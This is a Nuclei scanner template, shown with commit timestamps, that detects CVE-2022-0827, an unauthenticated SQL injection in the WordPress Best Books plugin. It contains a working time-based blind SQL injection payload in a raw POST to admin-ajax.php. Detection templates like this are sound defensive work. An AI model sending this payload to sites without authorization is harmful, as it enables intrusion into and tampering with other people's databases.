2023-03-31 11:28:24 +00:00
id : CVE-2022-0827
info :
2023-04-13 15:09:17 +00:00
name : WordPress Best Books <=2.6.3 - SQL Injection
2023-03-31 11:28:24 +00:00
author : theamanrawat
severity : critical
description : |
2023-04-13 15:09:17 +00:00
WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-03-31 11:28:24 +00:00
reference :
- https://wpscan.com/vulnerability/0d208ebc-7805-457b-aa5f-ffd5adb2f3be
- https://wordpress.org/plugins/bestbooks/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0827
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-0827
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.01515
cpe : cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:*
2023-03-31 11:28:24 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : presspage
product : bestbooks
2023-03-31 11:28:24 +00:00
tags : cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated
2023-04-27 04:28:59 +00:00
http :
2023-03-31 11:28:24 +00:00
- raw :
- |
@timeout 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1
matchers :
- type : dsl
dsl :
- 'duration_1>=6'
- 'status_code == 200'
- 'contains(body, "Account added successfully")'
condition : and